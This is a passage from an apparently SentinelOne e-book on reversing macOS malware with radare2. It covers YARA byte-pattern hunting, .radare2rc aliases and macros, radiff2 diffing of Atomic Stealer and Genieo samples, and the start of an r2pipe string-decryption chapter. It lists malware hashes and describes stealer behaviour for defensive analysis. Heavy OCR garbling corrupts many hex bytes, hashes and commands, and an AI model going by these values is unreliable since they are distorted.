piece of code and then look at the calling functions for useful sequences of byte code to hunt on. 


For example, you can use sf. to seek to the beginning of a function from a given address (assuming 
it’s part of a function, of course) and then use axg to get the path of execution to that function all the 
way from main( ). You can use pds to give you a summary of the calls in any function along the way, 
which means combining axg and pds is a very good way to quickly move around a binary in r2 to find 
things of interest. 


oCsLLLmLoLtLumcl 


int64_t arg_7 


int64_t 


sym 


x@12 > axg 
- @x@1247160 fcn @x@124716@ sym.WFBaWhsqW@BDXyLXIns 
@x@12475f6 fcn @x@1247160 sym.WFBaWhsgW@BDXyLXInS 
- @x@1247160 fcn @x@124716@ sym.WFBaWhsgW@BDXyLXInS 
- @x@12475f6 fcn @x@1247168 sym.WFBaWhsgW@BDXyLXIn5 
- @x@1247a41 fcn @x@1247a2@ sym.main.main 
~ @x@1247a20 fcn @x@1247a20 sym.main.main 
“ - @x@1247b2e fcn @x@1247a2@ sym.main.main 
Using the axg command - @x01247041 fcn Ox01247a20 sym.main.main 


to trace execution path 
back to main 


Now that we can see the call graph to the C2 string, we can start hunting for logic that is more likely 
to be re-used across samples. In this case, let’s hunt for bytes where sym.main.main calls the 
function that loads the C2 URL at 0x01247a41. 


oNQRDX: 
NFBalthsgWeB! 


ff 


mov rex, 


d [rsp], rox 
2408 ord [ J, rex 
Finding reusable logic that poyiae ss 


Shex_1247041 = { e8 lo f/ ff ff 48 8b 04 24 48 & 4c 24 OB 48 B35 7c 24 18 OO OF 8S OB OO OF OO 48 89 G4 24 48 89 4c 24 OB eb 97 fb ff ff 48 Bb 44 24 10 48 89 44 } 
should be more general 


than individual strings 


Grabbing 48 bytes from that address and hunting for it on VT gives us a much more respectable 45 
true positive (TP) hits. We can also see from VT that these files all have a common size, 5.33MB, which 
we can use as a further pivot for hunting. 


content:{ 68 1a {7 ff ff 48 8b 04 24 48 Bb 4c 24 O8 48 83 7c 24 10 00 Of 85 aB ON 00 00 48 89 04 24 48 89 4c 24 08 €8 97 fb ff ff 48 8b 4= 


macho 


macho 


Our hunt is starting to 
give better results, 
but don’t stop here! 


We've made a huge improvement on our initial hits of 3 and then 23, but we’re not really done yet. If 
we keep iterating on this process, looking for reusable code rather than just specific strings, imports 
or method names, we're likely to do much better, and by now you should have a solid understanding 
of how to do that using r2 to help you in your quest. All you need now, just like any good piece of 
malware, is a bit of persistence! 


Summary 


In this chapter, we’ve taken a look at some of r2’s lesser known features that are extremely useful 
for hunting malware families, both in terms of associating new samples to known families and in 
searching for unknown relations to a sample or samples we already have. 


O8 


File name Shal 


WizardUpdate_B1 2170787faafef2etb3cafcalc309c02c02a5969b 
WizardUpdate_B2 dfff3527b68b1c069ff956201ceb544d71c032b2 
WizardUpdate_B3 814b320b49c4a2386809b0bdb6ea3712673ff32b 
WizardUpdate_B4 6ca80bbf11ca33c55e12feb5a09f6d2417efafd5 
WizardUpdate_B5 92b9bba886056bc6a8c3df9c0f6c68715a7 74247 
WizardUpdate_B6 21991b7b2d71ac731dd8a3e3f0dbd8c8b35f162c 
WizardUpdate_B7 6e131dca4aa33a87e9274914dd605baa4t1fc69a 
WizardUpdate_B8 dac9aa343a327228302be6741108b5279adcef17 
Adload 279d5563f278f5aea54e84aa50ca355f54aac743 


Delivering Faster macOS Malware 
Analysis With r2 Customization 


In previous chapters, we’ve explored how analysts can use radare2 (aka r2) for macOS malware 
triage, work around anti-analysis tricks, decrypt encrypted strings, and generate function signatures 
and YARA rules. Like most reversing tools, radare2 can be customized and extended to increase the 
analyst’s productivity and make analysis and triage much faster. 


In this chapter, we look at some effective ways to power up r2, providing practical examples to 
get you started on the path to making radare2 even more productive for macOS malware analysis. 
We'll cover automation and customization via aliases, macros and functions. Along the way, we’ll also 
explore how we can effectively implement binary and function diffing with radare2. 


Power Up Your .radare2rc Config File 
With Aliases & Macros 


Just as most shells have a “read command” config file (e.g, .bashrc, .zshrc), so r2 has a 
~/.radare2rc file in which you can define environment variables, aliases and macros. This file 
doesn’t exist by default so you need to create it when you make your first customizations. 


It’s often said that one of the obstacles to adopting r2 is the steep learning curve, a large part of 
which is getting muscle-memory familiar with r2’s cryptic commands. One very fast way to flatten 
that curve is to define macros and aliases for new commands as you learn them — naming any 
hard-to-remember native commands with your own labels. 


Aliases and macros are also useful for chaining oft-used commands together. If you find yourself 
always running the same commands as your work through your initial triage of asample, you can save 
yourself some time and typing by combining those commands into one or more aliases or macros. 


An r2 customization 
to find the entrypoint 
of x86 dylibs 


The alias prints out 
the linked dynamic libraries 
in an executable file 


$config="!vi \~/.radare2rc" 

$coff='e asm.describe = false' 
$conn='e asm.describe = true' 
$dec='#!pipe /usr/local/bin/godec/dec' 


A! - | D~ 

$ie='s @ ie\~:1[1]- 

$fcol='afll\~:0' 

$nojumps='#!pipe /usr/local/bin/r2pipe/afll/afll' 
$rules='!vi /usr/local/bin/scan_machos/myyara.yara' 


$rust_start='s @° f\~&std\:\:rt::lang start,closure\~! internal | aw 
$top20='clear; $fcol; afll \| sort -k 3 -nr \| head -n 20' 
$topX='clear; $fcol; afll \| sort -k 14 -nr \| head -n 20' 
$ttp='!vi /usr/local/bin/scan_machos/ttp.yara' 

$x='b 0x200;px' 

$v='aav;aavr; aang' 

$vt='!vt file “o.* --limit 300 --include=meaningful_name,tags,popu 


(calls; pifc~!runtime~!sym.imp~!sym._fmt~!sym._math) 
(recurse; pdf @@=".(calls) | awk \'{print $NF}\'~) 


We will look at some useful examples below, but first let’s understand the syntax for aliases 
and macros. 


An alias is defined with a name prefixed bya S$ sign, an = operator, and a value in single quotes. Values 
can be one or more commands, separated by a semi-colon. For example, if you struggle to remember 
r2’s rather cryptic command names, you could replace them with more memorable command names 
of your own. Create a file at , add the following line and then save the file. 


Start a new r2 session. Now, typing at the r2 prompt will run the i1 command. You can still 
use il directly as well — as the name suggests, aliases are just alternative names, not replacements, 
for existing commands. 


1 $libs 
{Linked libraries] 
/usr/lib/libSystem.B.dylib 
/usr/lib/libresolv.9.dylib 
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation 
/System/Library/Frameworks/Security.framework/Versions/A/Security 


4 libraries 


From the book, we learn that macros are written inside parentheses with each 
command separated by a semi-colon. The first item in the list is the macro name. By way of example, 
rather than having a alias, why not print out sections and linked libraries at the same time? 


This example would do just that: 


Macros are called with the syntax . (macro) like so: 


[0x81065b00)> . (secs) 
[Sections] 


nth paddr size vaddr vsize type 


6x66661666 Ox23ddea 6xO1661006 6x23ddea REGULAR . etext 

6x8823ee00 Ox24c 8xO123ee88 Ox24c SYMBOL_STUBS -__symbol_stubl 
6x6023f060 Oxe8Of6 0x8123f060 Oxe8ef6 - REGULAR wee «__rodata 

0x66327160 ®x15f4 6x61327160 Ox15f4 REGULAR a -__typelink 
8x66328760 0x890 6x61328760 6x890 REGULAR “ -__itablink 
6x66328ffO 6x8 6x61328FfO 8x8 REGULAR 5 -__gosymtab 
6x688329088 O8x142cb8 8x81329888 8x142cb8 REGULAR ; -__gopelntab 
6x6046c000 6x168 6x6146c000 @x166 -rw- REGULAR pal «__£0_buildinfo 
@x6046c160 0x316 6x0146c160 0x316 NONLAZY_POINTERS 8._ | «__Nl_symbol_ptr 
8x8646c486 9 Ox319b8 6xO146c486 6x319b8 REGULAR ; -__noptrdata 
6x8849de48 Oxacf8 6x8149de48 Oxacf8 REGULAR -__DATA.__data 

6xeeeee0ae Ox8 6x814a8b40 Ox30ced ZEROFILL -__DATA.__bss 

6x66600000 6x8 6x614d98206 0x6450 - ZEROFILL -__DATA.__noptrbss 
6x664a9000 0x129 0x614e0000 0x129 REGULAR -__LINKEDIT.__zdebug_abbrev 
@x004a9129 Ox61b4d 0x614e0129 Ox6lb4d REGULAR -__LINKEDIT. zdebug line 
6x8858ac76 8x13995 6x81541c76 8x13995 REGULAR -__PAGEZERO.__zdebug_frame 
@x0051¢e60b @x2a @x@155560b @x2a ---- REGULAR .__PAGEZERO.__debug_gdb_scri 
6x6051e635 Oxa8f8a 0xO1555635 Oxasfs8a REGULAR -__PAGEZERO.__zdebug_info 
OxOO5c75bf  Ox76e25 OxOlSfeSbf  Ox76e25 REGULAR -__PAGEZERO. zdebug loc 
Ox8663e3e4 Oxibee3 6xO16753e4 Oxibee3 REGULAR -__PAGEZERO.__ zdebug_ranges 


WOIM HM bwWwneD 


{Linked Libraries] 

/usr/lib/libSystem.B.dylib 

/usr/lib/libresolv.9.dylib 

/System/Library/Frameworks/CoreFoundation. framework/Versions/A/CoreFoundation 
/System/Library/Frameworks/Security.framework/Versions/A/Security 


Calling a macro in r2 to 4 libraries 
print out a binary’s sections (SES ress evels 
and linked libraries 


It’s easy to see how you can build on this idea. 1 use a macro called .(meta) to give me all the basic 
info about a file’s structure as soon as I’ve loaded it into radare2. 


{Sections} 

nth pagar 
ex008e14e4 
0x000027ee 


6x00 co 
0x00002230 


a) 
06800708 


BG06L6 
BBOEcB 
000008¢8 
nked libraries) 
ary/Framewor' on. framework/Ver 


reFoundet 


Get all the info you 
need about a file with 
the meta macro 


Filtering wanted and 
unwanted information 
with r2’s ~ command 


This macro provides the file hashes in various algos, the compiled language, file size, sections, section 
entropy and the load commands. If the file under analysis is UPX packed, it will also indicate that, and 
if the source code is Go it displays the Go Build ID string. The macro is defined as follows, feel free to 
adopt or adapt it for your needs: 


(meta; it; i-file; i-class; isarch; isrlang; rh; iS  md5,entropy; 
ih~cmd~!cmdsize; il; izz | grep -e Go\ build\ ID -we upx;) 


Within the . (meta) macro, notice the command sequence ih~cmd~! cmdsize. This warrants a little 
explanation. Readers may recall that the tilde is r2’s internal grep function. The tilde followed by an 
exclamation mark ~! <expression> filters out the given expression, equivalent to grep -v. You 
can see the difference in the following image. 


[[0x01065b00] > nd 

®x01006028 cmd LC_SEGMENT_64 
®x01000024 cmdsize 

®x01006068 cmd LC_SEGMENT_64 
®x0100006c cmdsize 

®x810062e8 cmd LC_SEGMENT_64 
®x010002e4 cmdsize 

®x01000508 cmd LC_SEGMENT_64 
®x6100050c cmdsize 

®x01006788 cmd LC_SEGMENT_64 
®x01000784 cmdsize 

®x8100687c8 cmd LC_BUILD_VERSION 
®x010007cc cmdsize 

®x010067e8 cmd LC_UNIXTHREAD 
®x010007e4 cmdsize 

®x01000898 cmd LC_SYMTAB 
®x0100089c cmdsize 

®x010068b8 cmd LC_DYSYMTAB 
®x010008b4 cmdsize 

®x81006988 cmd LC_LOAD_DYLINKER 
®x01000904 cmdsize 

®x81006928 cmd LC_LOAD_DYLIB 
®x01000924 cmdsize 

®x010660958 cmd LC_LOAD_DYLIB 
@x0100095c cmdsize 

®x81006998 cmd LC_LOAD_DYLIB 
®x01000994 cmdsize 

@x610009f8 cmd LC_LOAD_DYLIB 
®x010009fc cmdsize 

[0x01065b00]> ih-cmd~lemdsize 

®x61000020 cmd 
®x01006068 cmd 
®x010062e8 cmd 
®x01000508 cmd 
®x01006788 cmd 
®x0100687c8 cmd 
®x010007e8 cmd 
®x01006898 cmd 
®x010008b8 cmd LC_DYSYMTAB 
®x01006988 cmd LC_LOAD_DYLINKER 
@x810600928 cmd LC_LOAD_DYLIB 
®x81006958 cmd LC_LOAD_DYLIB 
®x01006998 cmd LC_LOAD_DYLIB 
®x8100609f8 cmd LC_LOAD_DYLIB 


LC_SEGMENT_64 
LC_SEGMENT_64 
LC_SEGMENT_64 
LC_SEGMENT_64 
LC_SEGMENT_64 
LC_BUILD VERSION 

LC_UNIXTHREAD 

LC_SYMTAB 


WAN DUbhWNrH © 


The cc command places 
the output of the first 
address to the right of 
the second address. The 
.(diffs) macro fixes this 


Moreover, note that the .(meta) macro calls out to the system grep utility as well. The ability to 
utilize any command line utility on the system from within r2 is one of its major advantages over other 
reversing platforms. 


Passing Arguments to radare2 Macros 


Many of the things you can do with macros you could also do with Aliases, and vice versa; it’s largely a 
matter of personal preference. However, note that macros have one neat superpower — you can pass 
arguments to them. 


Here’s a good example: r2 has acommand for diffing or comparing code within a sample, either as hex 
or disassembly (cc and ccd). For some reason (I’m sure there’s a perfectly good one), this function 
counterintuitively displays the output from the first address given to the right of the output from the 
second address given. We can ‘correct’ this with a macro that takes the addresses as arguments but 
swaps their order when it passes them to cc. 


(diffs x yy; ce ST @ 80) 


cc 6x611f6960 @ OxO11lféfad 
6x611f6fa8 493 1 3 : ! 6x61176960 
8x811f6fbS 4484 $ 6x811f6918 
6x811f6fc8 6x811f6928 
8x811fé6fde 4 8x611f6938 
Ox61liféfed 6x611f6948 
Oxeliféeffe 8x611f6956 
6x011f7600 ! 6x011f6960 
6x611f7610 69 ! 6x011f6970 
6x011f7620 ! 6x011f6980 
6x611f7638 ! 6x611f6998 
6x611f7848 4 8x611f69a8 4 
8x6811f7858 6x611f69b8 
8x811f7668 4 8x811f69c8 
6x611f7878 @x611f69d6 
6x611f7686 @x611f69e8 
6x611f7696 ! 6x611fé9te 
- (diffs 0xO011f6900 6x011féfad) 
6x011f6900 493b661 1 I ! 6x011f6fad 
6x611f6918 4184 $ 6x611f6Fb8 
8x811f6928 ! 6x811f6fc8 
6x811f6938 ae ! 6x811f6fd8 
6x611f6948 Ox611féfee 
8x611f6956 Ox61liféeffe 
6x611f6968 @x611f76e8 
6x011f6976 ‘ c - ! 6x011f7610 
6x011f6980 ! 6x011f7620 
6x611f6990 ! 6x011f7630 
8x811f69a8 4 6x811f7848 
8x811f69b8 ! 6x811f7858 
6x811f69c8 é ‘ 6x811f7868 
8x611f69d8 6x611f78676 
8x811f69e8 8x611f7686 
6x811f69fe 8x611f7696 


Incidentally, the cc command (or our reimplementation of it in a macro) can be very useful for 
finding common code within samples when writing YARA or other hunting rules, a topic we'll discuss 
a bit further below. 


Finding IP Address Patterns 
and Other Useful Artifacts 


To find IP address patterns and other useful artifacts in a binary, you can create macros with 
search regexes. 


Here’s a few examples to get your started. 


A sample of Atomic Stealer 
quickly gives up its C2 with 
the help of the .(ip) macro 


The LockBit for Mac 
ransomware uses an 
XOR key of 0x39 


Find IP Address Patterns: 


(ip: fe #Vdt1, Sh). Nd{1, 3}. dt, 33%. Va, 3 hy) 


[0x81065b00]> o. 
56cd21cb9f114e7e1709592449ab7cce2bb3a2a7c89dab72f9be88a99Fc9e775 
[Ox81065b00)]> . (ip) 

O@xO12ab7de hit4_ 6 .6 = /Users/19531252.5.4.32.5.4.52.5.4.62.5. 
@xO12ab7e9 hit4_1 .19531252.5.4.32.5.4.52 

OxO1l2ab7f2 hit4_2 .5.4.32.5.4.52.5.4.62.5 

O@xOl2ab7fb hit4 3 .4.52.5.4.62.5.4.72.5.4 

®xO12abcib hit4_4 . status %!Month(2.5.4 

@xO12abc25 hit4_5 

O@xOl2ace4e hit4_6 .ndom100-continuel27.0.0.1:531525878906257. 
®x012b050a hit4_7 .share/mime/globs21.2.840.113635.100.1.346566. 
@x012b0516 hit4 8 .lobs21.2. 

®x012b4d74 hit4_9 .eiappafin p 

0x0134e19d hit4_16 .sg).marshal. 

@x0134e1d6 hit4_11 .sg).marshal. 1.1.1crypto/tls.(*. 
0x0134e556 hit4_12 .13).marshal. .1.3.lcrypto/tls. (*ce. 
0x0134e593 hit4_13 .13).marshal. .1.3.1.1crypto/tls. (*. 
0x0134e60d hit4_14 .13).marshal. .2.1crypto/tls. (*ce. 


Find Interesting Strings 

Search for places where an executable gathers user and local environment information. 
(reg; /e /home/i; /e /getenv/i; /e /Users/) 

You can automate different searches for XOR instructions with the following r2 macro: 


(xor ; f-xor | sort -k 2 -n; /e /xor byte/i; izz~+xor) 


(@x10800b354)> o, 
BbeGf1e927f973df35dad6c661048236d46879ad591824233d757ec6e722bde 

[@x1006b354]> .(xor) 

0x106854378 6 Sy | 

0x160640508 16 sym, crypto_stream_chacha20_xor_ic 

Bx106646d88 16 sym, crypto _stream_salsa26 xor_ic 

8x160640518 24 sym. crypto_stream_chacha2@_xor 

Bx100640d98 24 sym. crypto _stream_salsa20 xor 

Bx1090006a68 40 sym, de xor 

§x100840580 52 sym. crypto_stream_chacha2@_ietf_xor_ic 

0x16060405b4 56 sym. crypto_stream_chacha20_tetf_xor 

Bx100840f08 168 sym, crypto_stream_xsalsa28 xor 

Bx106646e54 186 sym. crypto_stream_xsalsa28_xor_ic 

8x166669718 3624 sym. de xor_all 

$011 OxOGOScdbb Bx1080Scdbb ascii _xor 

5186 6x@805da72 8x18605da72 ascii Sxor 

5185 8x@8@Sdacb Ox1800S5dacb ascii &xor 

$196 8x@8@Sdb6a Gx1860Sdb6a ascii 'xor 

5507 8xO006256b 6x19006256b ascii _crypto_stream chacha20_ ietf_xor 
$5568 6x@806258c 6x18006258c ascii _crypto_stream_chacha26_ietf_xor_ic 
5513 Ox@006263c 8x10006263¢ ascii crypto stream chacha26_ xor 

5514 6x68062658 6x190062658 ascii _crypto_stream_ chacha2@ xor_ic 
5526 6x@68062716 6x160062716 ascii _crypto_stream_salsa26_xor 

5521 6x@8062731 6x160062731 ascii _crypto_stream_salsa28 xor_ic 

$527 Ox080627f3 Ox1900627f3 ascii _crypto_stream_xsalsa20_xor 

$528 8xO806286f Gx18G06280f ascii _crypto_stream_xsalsa26 xor_ic 

5538 8x680628ce Ox1806628ce ascii 

5539 6x800628d6 6x1980628d6 ascii 

5861 6x060637ac 6x1600637ac ascii 

(@x19806b354)> pd q 


: xor_val 

; STRN XREF from ‘ e xor @ 0x100006a68(r) 

; DATA XREF from xor_all @ 6x1000697286(r) 
; DATA XREF from 6x 18808b4d8(r) 


0x 108054376 Boon invalid 
[@x10800b354)> 


A simple YARA rule 
to detect Geacon 
samples called from 
the r2 command line 


Testing a File Against Local YARA Rules 


For the following two macros, you will need YARA installed locally on the host. This can be done with 
MacPorts, Homebrew or by installing from Github and following the instructions here. 


With YARA installed, it is easy to call it from within r2 to see if a rule you’ve created for a sample 
will fire. This is a great way to develop and test rules on the fly as you triage new samples. 


On my analysis machines, I have my rules stored ina subdirectory of /usr/local/bin, so my macro 
looks like this: 


(yara; !yara -s /usr/local/bin/scan_machos/myyara.yara “o.°) 


As yara is an external command, it is prefixed by an exclamation point ! in r2. This is how to 
tell the r2 shell that we want to call an external command line utility, a very useful feature that 
allows you to bring in all the power of the command line utilities at your disposal directly into r2. 
The -s option allows us to see which strings hit (and how many times). See man yara for more 
options. The 0. ~ command at the end of the macro is an r2 command that returns the file name of 
the currently loaded binary. 


Oo. 
SecureLink_Client 

[ 52 (yara) 

Geacon CobaltStrike SecureLink_Client 

0x3b8982:$a1: FirstBlood 

@x7525a5:$al: FirstBlood 

@x3b89a0:$a2: PullCommand 

0x7526a8:$a2: PullCommand 

@x3b87d5:$a3: ParsePacket 

@x752662:$a3: ParsePacket 

0x2f3936:$b: searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z0700 


Sentinel 


Since Apple’s own built-in malware blocking tool XProtect also uses YARA rules, you can create a 
macro to see whether Apple has a rule for your sample. To create an .(xp) macro to check files 
against Apple’s XProtect database signatures file (remember: YARA must be installed first), 
use the following macro: 


(xp; !yara -w /Library/Apple/System/Library/CoreServices/xXProtect .bundle/ 
Contents/Resources/XProtect.yara °o.°) 


Don’t be surprised, however, if you don’t get many matches: XProtect’s YARA signature database is 
thin at best. 


Print Your Customizations When radare2 Starts Up 


By now, you might be starting to collect quite a list of macros and aliases. How to remember them 
all? There’s a couple of built-in ways, and we'll also look at one last .radare2rc customization to help 
us out with this, too. 


Printing out aliases and 
macros with their values 


It can be helpful to 
automatically print the 
entire config file out 
as r2 starts up 


From within, r2 you can see all defined aliases and macros by typing $* and (*, respectively. 


$* 
$dylib=pd 1 @°iS~mod_init_func[3]° 
$v=aav;aavr 
$x=b 6x268;px 
$k='k syscall/* 

" 


( 
"(calls ; pifc=!runtime~!sym. imp)” 
“(dylib ; s @°Sdylib-[2]"; pd 5)" 
“(gafl ; afl | grep -e main -e github | sort -k 4)* 
“(gostr ; !/usr/local/bin/gostrings “o.°)" 
“(hashstrings ; /z 31 65)" 
"Cip : fe /\d{1,3}\.\d{1.3}\.\d{1,.3)\.\d{1.3)/)" 
"(meta ; it; i-file: i-~class; i~arch: i-lang: rh: iS mdS.entropy: ih~cmd~!cmdsize;il; izz | grep -e Go\ build\ ID -we upx;)”" 
"(pdd ; eco greepy: pdd; eco monokai)” 
"(reg ; /e /home/i; /e /getenv/i; /e /Users/)" 
"(xor ; f=xor | sort -k 2 -n; /e /xor byte/i; izz~+xor)" 
"(xp ; lyara -sw /Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.yara “o.°)" 
"(yara ; lyara -sw /usr/local/bin/scan_machos/myyara.yara “o.°)" 


We can also have r2 print our entire config file when it starts up by adding a further customization. 
Attheendofthe .radare2rc file, try something like this: 


echo ENV: ; !cat -v /Users//.radare2rc | sed -e 'S$ d'; echo; 
The sed command after the pipe prevents the last line of the file from being printed — an optional 


customization you can ignore if you wish. You could also just add the $* and (* commands above to 
the config file instead, but I like to see the whole file as a reminder of the entire environment. 


These examples should be enough to get you started creating useful aliases and macros to help 
speed along your own analysis. 


How to Diff Binaries and 
Binary Functions with radare2 


Aliases and macros are useful shortcuts — the command line equivalent to GUI apps’ hotkeys and key 
chords — but there are other, more powerful ways we can customize radare2 and drive it with custom 
functions and scripts. 


As an example, let’s add the following function to our shell config file (e.g.,~/.zshrcor~/.bashrc): 


rfunc() { 
radiff2 -AC -t 100 $1 $2 2> /dev/null | egrep --color "\bUNMATCH\b|S$" 


Two variants of 
Atomic Stealer. 

The sendlog function 
exfiltrates user data 


Genieo samples of 
varying sizes 


This leverages a radare2 tool called radiff2. This tool (among a bunch of others) is installed as part 
of the radare2 suite. With the function added to our shell config, we’ll start a new Terminal session 
and call the function directly from the command line rather than from within r2. 


S rfunc filel file2 


The rfunc( ) function tells us which functions match, which do not, and which are new between any 
two given binaries. Here’s part of the output from two very different variants of Atomic Stealer: 


sym._type:.eq.github.com_mattn_go_sqlite3_result.1 @x1002dd440 eeaeee) 


sym._main.main 6x1662dd4e6 | UNM 6e8688) | 6x123d908 78 sym._main.main 
sym._main.GeckoBrowser @x1662d 7468 688868 
sym._main.GeckoBrowser. funcl @x1002df528 888808 
sym._main.GeckoAutofill @x1602d F868 800608 
sym._main.GeckoAutof ill. func? @x1602dfec® 690000 
sym._main.GeckoAutofill.funci 6x1662dff26 698868 
ya._main.ChromiumBrowser @x1662df 186 008808 
in.ChromiumBrowser. funcl @x1062e11c8 880808 
sym._main.get_cookie 6x1902¢1886 800808 
sym._main. get_cookie. funcl 6x1662e21a0 eeaeee) 

sym._main.sendlog 6x1662e2266 | UN 363488) | @x123ea28 695 sym._main.sendlog 
sym._main.GoogleAutof ill 6x1662e26e8 688868 
sym._main.ChromiumAutofill @x1602e27¢8 -890808 
sym._main.ChromiumAutof ill. func2 @x1002¢2d26 888608 
sym._main.ChromiumAutofill.funcl 8x1062e2086 eeeeee) 
sym._main.GooglePasswords 6x1062e2de8 | CL) 
sym._main.GooglePasswords. funcl 6x1662e3668 Rt) 
sym._main.KeyAES 6x100203668 888808 
sym._main.GeckoCookie @x1002e32e0 808808 
sym. main.GeckoCookie.func2 @x106264248 eeeee8) 
sym._main.GeckoCookie. funci 6x1062e42a0 608808 

sym._main.init 6x1662e4366 | UNMA 184223) | @x123fd80 2041 sym._main. init 

_type:.eq.main.PluginWallet @x1062e45a8 a) 
sym._type:.eq.main. autofill @x1902¢4648 880808 
sym._type:.eq.main.cookie 0x1002e46¢e8 880808 


syn. 


To get a graphical output of how two functions differ, let’s begin by using radif f2 directly. This utility 
has many options and we'll only explore a few here, but it is well worth digging into deeper. 


You can compare two functions or offset addresses in two binaries with the following syntax: 
S radiff2 -g offsetl,offset2 filel file2 


Or, in case both binaries use the same function name, e.g., sym. _main.sendlog in our example 
above, you can simply provide the function name instead of the addresses: 


S radiff2 -g <function_name> file1, file2 


In this example, I’ll compare the main function of two samples of Genieo adware. 


total 2672 

drwxr-xr-x 6 staff 192 11:54 

drwxr-xr-x 47 start 1504 17:05 
-rw-r--r--@ 1 staff 6148 11:54 ,.DS_Store 
21:09 1049254721 


-rwW-r--r--@ staff 1215086 
~rwxr-xr-x@ staff 51968 1979 
~rwxr-xr-x@ staff 89392 1979 al 


As shown in the image above, the files are quite different sizes. 


Partial output of radiff2’s 
graphical diff engine 


S radiff2 -g main 
a1219451eacd57f5ca0165681262478d4b4f829a7 F7732 F75884d06c2287efba 
80573de5d79f580c32b43c82b59 fbf 445b91 d6e1 86b3 a4 F2F67F2a84F 4944433 


YRRRMETI ERR RMB ERR H Ae eae Rea eee Rasa Rese ean k ena eaage eee aD 
8x 100006134 


mov x25, x29 


@@ -7,11 +7,11 @ 


adrp x8, 
add x6, x8, 6x430 


add x8, x8, 6x13 


@2@ -23,4 +23,4 @ 


x®, [sp, ] 
x 1 6166 


9324 


Sentinel 


However, the output shows us that the main functions are structured identically and differ only in 
terms of offset addresses and certain hard coded values. This kind of information is extremely helpful 
for creating effective signatures for a malware family. 


As radiff2 outputs to the Terminal, display can sometimes be tricky. It’s possible to leverage 
Graphviz and the dot and xdot utilities to produce more readable graphs. Though a deep dive into 
Graphviz takes us beyond the scope of this eBook, try installing xdot from brew install xdot and 
playing around with options such as these: 


S radiff2 -md -g <function_name> filel file2 | xdot - 


As xdot is Python based, I’ve found it can sometimes be temperamental when it comes to escaping 
strings passed from radiff2 and occasionally spits out “unknown op code” errors. When this happens, 
one of a few ways you can sidestep xdot and Python is as follows: 


S radiff2 -md -g <function_name> filel file2 > main.dot 
S$ dot -Tpng main.dot -o main.png 
S open main.png 


These can produce graphical diffs such as the following: 


CODE WEF tam men & 10000 


HEF fom man @ Ox 100004 9820x) 
free 20h] 


Of course, once you hit on one or more graph workflows that work for you, it’s possible to then add 
these as functions to your shell config file for maximum convenience. 


Here’s an example: 


rdiff () ¢ 
if [ "S#" -eq 4 ] 
then 
radiff2 -A -md -g -t 100 $1,$2 $3 $4 2> /dev/null | tail -n 
+28 | sed 's/fillcolor="lightgray"/fillcolor="lightblue"/g' | sed 
's/fillcolor="yellow", color="black"/ 
fillcolor="#F4C2C2",color="lightgray"/g' | sed 's/"Courier"/"Poppins"/g' | 
sed 's/color="black"/color="lightgray"/g' | xdot - 
elif [ "S#" -eq 3 ] 
then 
radiff2 -A -md -g -t 10@ $1 $2 $3 2> /dev/null | tail -n +28 
| sed 's/fillcolor="lightgray"/fillcolor="lightblue"/g' | sed 
's/fillcolor="yellow", color="black"/ 
fillcolor="#F4C2C2",color="lightgray"/g' | sed 's/"Courier"/"Poppins"/g' | 
sed 's/color="black"/color="lightgray"/g' | xdot - 
else 
echo "Wrong number of arguments supplied." 
2 


This function allows you to specify either three args (a function name, and two file paths) or four 
(two offsets, two file paths) - beware there’s minimal error checking. Two other things of note: 
viathe -Aoption, radif f2 passes the files tor2 for analysis. Thiscanimprove radiff2‘s diffingoutput. 
However, recall that our earlier customization has r2 print out our config file when it runs. We don’t 
want this output passed to xdot (or dot) or it will cause errors. In my case, my . radare2rc file is 
27 lines long, soIuse tail -n +28 to start printing from the 28th line. That number will need to be 
adjusted for the length of your own .radare2rc config file, and you’ll need to remember to adjust 
the function if you later edit the config file such that it changes length either way. Secondly, note the 
series of sed commands. These are a quick and dirty way to alter the default colors of the output, 
so adjust or remove to your liking. 


Summary 


In this chapter we’ve seen how we can power up radare2 by means of aliases, macros and functions. 
We've learned how these shortcuts and automations can allow us to make r2 easier and more 
productive to use 


That’s not all there is to powering up radare2, however, as we have yet to explore driving radare2 with 
scripts via r2pipe to do deeper analysis, decrypt strings and other advanced functions. 


SENTINELONE E-BOOK A SECURITY PRACTITIONER’S GUIDE TO REVERSING MACOS MALWARE WITH RADARE2 61 


O9 Automating String Decryption 
and Other Reverse Engineering 
Tasks in radare2 With r2pipe 


In the last chapter, we looked at powering up radare2 with aliases and macros to make our work more 
productive, but sometimes we need the ability to automate more complex tasks, extend our analyses 
by bringing in other tools, or process files in batches. 


Most reverse engineering platforms have some kind of scripting engine to help achieve this kind of 
heavy lifting and radare2 does, too. In this chapter, we'll learn how to drive radare2 with and 
tackle three different challenges that are common to RE automation: decrypting strings, applying 
comments, and processing files in batches. 


Scripting radare2 with C, Go, 
Swift, Perl, Python, Ruby... 


No matter what language you’re most comfortable working in, there’s a good chance that r2pipe 
supports it. There are 22 supported languages, though they are not all supported equally. 


pipe spawn async http tcp json plug 
Cc xX - x 
C++/Qt 


X 

C# / F# xX 
) X 
Erlang X 
Go X 
Haskell X 

Java/Groovy 

Lisp 

NewLisp 

Nim 

NodeJS 

Ocaml 

Perl 

PHP 

Python 

Ruby 

Rust 

Swift 

Vala 

V 
Programming Clojure 
languages supported 
by radare2’s r2pipe 


x KK KK KK mK KK OK 


OSX.Fairytale uses 0x30 
as a hard coded key for 
XOR decryption 


C, NodeJS, Python and Swift are the most well-supported languages, but I tend to use Go for speed 
and brevity, and it lets me hack scripts together rather haphazardly to achieve what I need. When 
scripting your own reversing sessions, there’s little need to worry about the niceties of programming 
style or convention as we would do when shipping code for production or other purposes. Although 
performance can be improved by doing things in one language rather than another, that’s something 
I rarely need to worry about in practice in my reversing work. 


All that’s a preamble to saying that you can — and probably should! — write better scripts than those 
I’ll show here, but these examples will serve as a good introduction to how you can easily hack your 
way around problems thanks to r2’s shell integration to get a working solution without worrying too 
much about “the right” or “the best” way to do it. 


Automated String Decryption in OSX.Fairytale 


We'll use a sample of OSX.Fairytale to illustrate automated string decryption. 


md5 0194c31984d1501bf983 5cO0d4d48cbbf 
shal 26cb736b42b213101d49079b17 6b8f4f97d59ae2 
sha256 a9a7a1c48cd1232249336749f4252c845ce68fd9e7da8 5b6dab6ccbcdc21bcf66 


Though I'll be using Go, you can easily apply the same techniques in whatever other language 
you prefer. 


Like many simple malware families, Fairytale encrypts strings with a combination of base64 and 
